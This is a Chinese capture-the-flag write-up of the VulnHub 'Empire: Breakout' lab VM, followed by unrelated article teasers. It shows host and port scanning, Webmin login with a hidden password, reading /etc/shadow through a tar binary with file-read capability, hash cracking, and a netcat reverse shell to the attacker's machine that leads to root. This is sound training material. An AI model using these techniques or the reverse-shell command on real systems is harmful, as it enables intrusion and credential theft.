[vulnhub]Empire: Breakout

https://www.vulnhub.com/entry/empire-breakout,751/

端口扫描主机发现

  1. 探测存活主机,183是靶机

    nmap -sP 192.168.75.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 23:37 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00045s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00025s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.183
    Host is up (0.00011s latency).
    MAC Address: 00:0C:29:BD:9A:8D (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00037s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    
  2. 探测主机所有开放端口,仅存在80端口

    nmap -sT -min-rate 10000 -p- 192.168.75.183
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 23:40 CST
    Nmap scan report for 192.168.75.183
    Host is up (0.0010s latency).
    Not shown: 65530 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    80/tcp    open  http
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    10000/tcp open  snet-sensor-mgmt
    20000/tcp open  dnp
    MAC Address: 00:0C:29:BD:9A:8D (VMware)
    
  3. 探测服务版本以及系统版本

    nmap -sV -sT -O -p 80,139,445,10000,20000 192.168.75.183
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 23:41 CST
    Nmap scan report for 192.168.75.183
    Host is up (0.00047s latency).PORT      STATE SERVICE     VERSION
    80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
    139/tcp   open  netbios-ssn Samba smbd 4.6.2
    445/tcp   open  netbios-ssn Samba smbd 4.6.2
    10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
    20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
    MAC Address: 00:0C:29:BD:9A:8D (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 4.X|5.X
    OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
    OS details: Linux 4.15 - 5.8
    Network Distance: 1 hop
    
  4. 扫描漏洞

    nmap -script=vuln -p 80,139,445,10000,20000 192.168.75.183
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 23:42 CST
    Nmap scan report for 192.168.75.183
    Host is up (0.00028s latency).PORT      STATE SERVICE
    80/tcp    open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-csrf: ......................|_    Form action: https://www.google.com/search
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum: 
    |_  /manual/: Potentially interesting folder
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    10000/tcp open  snet-sensor-mgmt
    | http-vuln-cve2006-3392: 
    |   VULNERABLE:
    |   Webmin File Disclosure
    |     State: VULNERABLE (Exploitable)
    |     IDs:  CVE:CVE-2006-3392
    |       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
    |       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
    |       to bypass the removal of "../" directory traversal sequences.
    |       
    |     Disclosure date: 2006-06-29
    |     References:
    |       http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
    |       http://www.exploit-db.com/exploits/1997/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
    20000/tcp open  dnp
    MAC Address: 00:0C:29:BD:9A:8D (VMware)Host script results:
    |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
    |_smb-vuln-ms10-054: false
    |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
    

    139,445netbios-ssn80是web服务,并且10000端口运行的是webmin ,并且扫出漏洞CVE-2006-3392 任意文件读取

web渗透

80端口

  1. 还是先从80端口开始吧,访问主页是Apache2 Debian 的默认页面

    在这里插入图片描述

    检查一下页面,F12发现存在一段文字

    
    don't worry no one will get here, it's safe to share with you my access. Its encrypted :)++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
    

    这一长串的不知名的是什么玩意?Google了一下这是Brainfuck (一种编程语言),解释后是

    .2uqPEfj3D<P'a-3
    

    可能是一串明文密码

  2. 扫描一下目录,就扫描出了manual目录,也就是文档目录,估计也不会藏东西

10000端口

  1. 指纹识别没识别出来,但是LOGO写的是webmin,并且nmap也扫描出了漏洞

    在这里插入图片描述

  2. 因为之前得到了一串明文密码,我们可以用它来尝试枚举用户名,枚举了一下就被封ip了(笑),目录扫描也不行

  3. 尝试利用扫出来的漏洞CVE-2006-3392 ,在searchexploit搜索了两个脚本,pl的需要设置ssl 证书,php的爆不出来,这条路也放弃了

  4. 因为目标服务器装了samba ,所以我们可以使用**Enum4linux** 工具来枚举信息

    **Enum4linux 192.168.75.183
    //**
    [+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                                                                       S-1-22-1-1000 Unix User\cyber (Local User)
    

    枚举出一个用户cyber ,配合之前的得到的明文密码.2uqPEfj3D<P'a-3,可以尝试登陆一下

  5. 10000 端口尝试密码错误,切换到20000端口尝试(20000端口也是相同登陆页面)登陆成功,进入后台

后台利用

  1. 进入后台,开始搜寻可利用的点

    在这里插入图片描述

  2. 看到底下有一个我i们感兴趣的Command shell ,点击后进入命令行了

    在这里插入图片描述

提权

  1. 查看权限(这里的shell比反弹的好用,就没反弹)

    [cyber@breakout ~]$ whoami
    cyber
    [cyber@breakout ~]$ id
    uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
    [cyber@breakout ~]$ uname -a
    Linux breakout 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux
    
  2. 寻找敏感文件

    • 当前家目录文件夹下存在taruser.txt 文件

      # user.txt
      [cyber@breakout ~]$ cat user.txt
      3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
      

      tar是一个可执行文件,我们检测suid 和capability,通过**getcap命令发现它有cap_dac_read_search=ep**,因此它可以读取任意文件(利用该tar 打包再解压就可以查看没有权限查看的文件内容)

      [cyber@breakout ~]$ ls -al | grep tar
      -rwxr-xr-x  1 root  root  531928 Oct 19  2021 tar
      [cyber@breakout ~]$ getcap tar
      tar cap_dac_read_search=ep
      
  3. 这样我们就可以使用tar来读取隐私文件了

    • 读取shadow文件,注意:使用tar必须是家目录下的tar

      [cyber@breakout ~]$ ./tar -cvf shadow.tar /etc/shadow
      ./tar: Removing leading `/' from member names
      /etc/shadow
      [cyber@breakout ~]$ ./tar -xvf shadow.tar
      etc/shadow
      [cyber@breakout ~]$ cat etc/shadow
      root:$y$j9T$M3BDdkxYOlVM6ECoqwUFs.$Wyz40CNLlZCFN6Xltv9AAZAJY5S3aDvLXp0tmJKlk6A:18919:0:99999:7:::
      daemon:*:18919:0:99999:7:::
      bin:*:18919:0:99999:7:::
      sys:*:18919:0:99999:7:::
      sync:*:18919:0:99999:7:::
      games:*:18919:0:99999:7:::
      man:*:18919:0:99999:7:::
      lp:*:18919:0:99999:7:::
      mail:*:18919:0:99999:7:::
      news:*:18919:0:99999:7:::
      uucp:*:18919:0:99999:7:::
      proxy:*:18919:0:99999:7:::
      www-data:*:18919:0:99999:7:::
      backup:*:18919:0:99999:7:::
      list:*:18919:0:99999:7:::
      irc:*:18919:0:99999:7:::
      gnats:*:18919:0:99999:7:::
      nobody:*:18919:0:99999:7:::
      _apt:*:18919:0:99999:7:::
      systemd-timesync:*:18919:0:99999:7:::
      systemd-network:*:18919:0:99999:7:::
      systemd-resolve:*:18919:0:99999:7:::
      messagebus:*:18919:0:99999:7:::
      cyber:$y$j9T$x6sDj5S/H0RH4IGhi0c6x0$mIPyCIactTA3/gxTaI7zctfCt2.EOGXTOW4X9efAVW4:18919:0:99999:7:::
      systemd-coredump:!*:18919::::::
      
  4. 尝试john破解root密码

    将root的密码复制保存到password

    john password --format=crypt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (crypt, generic crypt(3) [?/64])
    Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
    Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
    Will run 8 OpenMP threads
    Proceeding with single, rules:Single
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Almost done: Processing the remaining buffered candidate passwords, if any.
    Proceeding with wordlist:/usr/share/john/password.lst
    

    破解了很久没爆出来

  5. 我们接着寻找敏感文件

    • /var/backups 下存在 .old_pass.bak ,我们使用上面步骤查看文件内容

      [cyber@breakout ~]$ ./tar -cvf old_pass.tar /var/backups/.old_pass.bak
      ./tar: Removing leading `/' from member names
      /var/backups/.old_pass.bak
      [cyber@breakout ~]$ ./tar -xvf old_pass.tar
      var/backups/.old_pass.bak
      [cyber@breakout ~]$ cat var/backups/.old_pass.bak
      Ts&4&YurgtRX(=~h
      

      得到一串明文Ts&4&YurgtRX(=~h ,可能是密码

  6. 我们可以尝试一下root账号使用上面得到的明文登录

    • 在网页上的命令行是不行,我们进行反弹shell ,同时kali开启监听

      # kali 监听
      nc -lvp 1234            
      listening on [any] 1234 ...# 网页命令行反弹shell
      nc 192.168.75.151 1234 -e /bin/bash
      
    • 获得shell之后直接su root

      nc -lvp 1234            
      我们可以尝192.168.75.183: inverse host lookup failed: Unknown host
      connect to [192.168.75.151] from (UNKNOWN) [192.168.75.183] 41962id
      uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
      su root
      Ts&4&YurgtRX(=~h
      id
      uid=0(root) gid=0(root) groups=0(root)
      

      获得权限!!!

  7. 读取flag文件

    # cat rOOt.txt
    3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}Author: Icex64 & Empire Cybersecurity
    

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/4788.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

精益生产管理培训对哪些岗位的人更有帮助?

精益生产管理培训作为一种提升企业运营效率和管理水平的有效手段&#xff0c;在现代企业中扮演着至关重要的角色。它不仅能够帮助企业减少浪费、优化流程&#xff0c;还能增强员工的责任感和团队协作能力。那么&#xff0c;精益生产管理培训对哪些岗位的人更有帮助呢&#xff1…

OpenCV的操作

1.图像的基本操作 1.1读取图像 image_handler cv2.imread(image_path, cv2.IMREAD_COLOR) 第一个参数图片的存储路径&#xff0c;第二个参数是图像的读取方式 第二个参数有三个选项: cv2.IMREAD_UNCHANGED&#xff1a;保持原格式不变&#xff0c;-1&#xff1b;cv2.IMREA…

数据结构之单链表

前言&#xff1a;上一篇文章我们了解到顺序表&#xff0c;这一次来看另一种线性表-------单链表。 1. 单链表的概念 单链表&#xff0c;想必很多人会感到陌生吧。那么&#xff0c;到底什么是单链表呢&#xff1f;先了解清楚单链表的概念及特性&#xff0c;才能够更好的实现单…

RabbitMQ死信队列

RabbitMQ死信队列 1、RabbitMQ死信队列2、代码示例2.1、队列过期2.1.1、配置类RabbitConfig&#xff08;关键代码&#xff09;2.1.2、业务类MessageService2.1.3、配置文件application.yml2.1.4、启动类2.1.5、配置文件2.1.6、测试 2.2、消息过期2.2.1、配置类RabbitConfig2.2.…

高亚科技签约酸动力,助力研发管理数字化升级

近日&#xff0c;中国企业管理软件资深服务商高亚科技与广东酸动力生物科技有限公司&#xff08;以下简称“酸动力”&#xff09;正式签署合作协议。借助高亚科技的8Manage PM项目管理软件&#xff0c;酸动力将进一步优化项目过程跟踪与节点监控&#xff0c;提升研发成果的高效…

Linux操作系统:学习进程_对进程的深入了解

目录 前言 开篇 一、进程概念 二、进程的描述与管理 1、如何描述与管理 2、Linux中的PCB-task_struct 3、对进程组织的理解 三、进程的属性 1、系统创建进程 2、查看进程 3、进程的标识符 4、退出进程 1>ctrlc 2>kill命令杀死进程 5、用户进程的创建方式…

大客户营销数字销售实战讲师培训讲师唐兴通专家人工智能大模型销售客户开发AI大数据挑战式销售顾问式销售专业销售向高层销售业绩增长创新

唐兴通 销售增长策略专家、数字销售实战导师 专注帮助企业构建面向AI数字时代新销售体系&#xff0c;擅长运用数字化工具重塑销售流程&#xff0c;提升销售业绩。作为《挑战式销售》译者&#xff0c;将全球顶尖销售理论大师马修狄克逊等理论导入中国销售业界。 核心专长&…

【Attention】ICAFusion:用于多光谱物体检测的迭代交叉注意引导的特征融合

ICAFusion: Iterative cross-attention guided feature fusion for multispectral object detection 摘要&#xff1a; 多光谱图像的有效特征融合在多光谱物体检测中起着至关重要的作用。以往的研究已经证明了使用卷积神经网络进行特征融合的有效性&#xff0c;但由于局部范围…

CSP/信奥赛C++刷题训练:经典广搜例题(2):洛谷P1135 :奇怪的电梯

CSP/信奥赛C刷题训练&#xff1a;经典广搜例题&#xff08;2&#xff09;&#xff1a;洛谷P1135 &#xff1a;奇怪的电梯 题目背景 感谢 yummy 提供的一些数据。 题目描述 呵呵&#xff0c;有一天我做了一个梦&#xff0c;梦见了一种很奇怪的电梯。大楼的每一层楼都可以停电…

K8S群集调度二

一、污点(Taint) 和 容忍(Tolerations) 1.1、污点(Taint) 设置在node上是对pod的一种作用 节点的亲和性&#xff0c;是Pod的一种属性&#xff08;偏好或硬性要求&#xff09;&#xff0c;它使Pod被吸引到一类特定的节点 而Taint 则相反&#xff0c;它使节点能够排斥一类特…

成都郝蓉宜恺文化传媒:引领大数据应用新篇章

在信息化浪潮汹涌的今天&#xff0c;大数据被誉为新时代的“石油”&#xff0c;正在以前所未有的速度改变着我们的生活和工作方式。成都郝蓉宜恺文化传媒&#xff0c;作为大数据领域的领军企业&#xff0c;始终站在创新的前沿&#xff0c;引领着大数据应用的新篇章。 作为大数…

51c自动驾驶~合集5

我自己的原文哦~ https://blog.51cto.com/whaosoft/11563178 #MapDistill 速度精度双起飞&#xff0c;让End2End更丝滑 在线高精&#xff08;HD&#xff09;地图构建是自动驾驶领域的一项重要且具有挑战性的任务。最近&#xff0c;人们对不依赖于激光雷达等其他传感器的基于…

如何在 SAP 中直接运行原生 SQL 语句

作为 ABAP 开发应该知道&#xff0c;SAP 支持在程序中运行 ABAP SQL&#xff0c;但是如果想要运行原生 SQL&#xff0c;就要借助 SQL 编辑器了。 Ps&#xff1a;你得向 Basis 申请权限。 SQL 编辑器允许您直接执行 SQL 语句。 1 SQL 编辑器启动方式 它可以在以下 T-code 中执…

华普微隔离芯片,赋能中国新基建之光伏创新

一、华普微隔离芯片助力光伏产业发展&#xff1a;现状、应用与未来展望 当前&#xff0c;光伏行业正深陷在无序扩张、产能过剩及激烈内卷的困境之中。为打破这种恶性竞争局面&#xff0c;光伏行业未来发展的“主旋律”已定调在淘汰落后产能、倡导企业兼并重组与加速技术革新步…

时隔7年,我终于考了CISSP

七年前&#xff0c;我开启了信息安全之旅&#xff0c;将 OSG 第 4 版作为敲门砖。耗费两个月时间硬着头皮读完&#xff0c;却如坠云雾&#xff0c;全然不知其深意&#xff0c;仅仅在脑海中隐约勾勒出一个大致的知识框架。 随后&#xff0c;我幸运地找到了相关工作&#xff0c;…

中科蓝汛GPIO操作说明

概述 本篇文章介绍如何使用中科蓝汛AB5681&#xff0c;GPIO管脚使用说明。 一、第一种写法 1&#xff09;、GPIO配置输入模式 //内部上拉 GPIOBDE | BIT(4); //数字IO使能: 0为模拟IO, 1 为数字IO GPIOBDIR | BIT(4); //控制IO的方向: 0为输出, 1为输入. GPIOBFEN &…

RHCE 配置文件

配置文件 配置文件排错 1.1 配置基于主机名的 Web 服务器1.2 配置基于端口的 Web 服务器1.3 配置基于IP地址的 Web 服务器1.4 配置账号验证访问1.5 配置 https 加密服务1.6 课后习题 配置文件 配置文件vim里面内容时&#xff0c;用空格分割 #寻找配置文件 [rootlocalhost ~]# r…

笔记整理—linux驱动开发部分(8)framebuffer类设备

framebuffer显示设备。 在应用层直接抽象位向DDR中存放图片。 在操作系统中&#xff0c;将上图分为两个部分&#xff1a;驱动应用。 使用复制的方法效率十分的低&#xff0c;所以有了内存映射方法实现图片的显示。 framebuffer帧&#xff08;铺满一个屏幕&#xff09;&#xff…

智慧测绘数字化管理平台建设方案

随着信息技术的飞速发展&#xff0c;测绘地理信息与遥感专业正经历着一场革命性的变革。智慧测绘数字化管理平台的建设&#xff0c;不仅能够提高测绘数据的准确性和实时性&#xff0c;还能为城市规划、环境保护、灾害预防等领域提供强有力的数据支持。本文将探讨智慧测绘数字化…

conda的作用

conda是一个开源的包和环境管理系统&#xff0c;用于安装、管理和切换不同版本的软件包及其依赖项。它不仅支持Python&#xff0c;还适用于R、Ruby等多种编程语言。以下是详细介绍&#xff1a; 多语言支持&#xff1a;conda支持多种编程语言&#xff0c;包括但不限于Python、R、…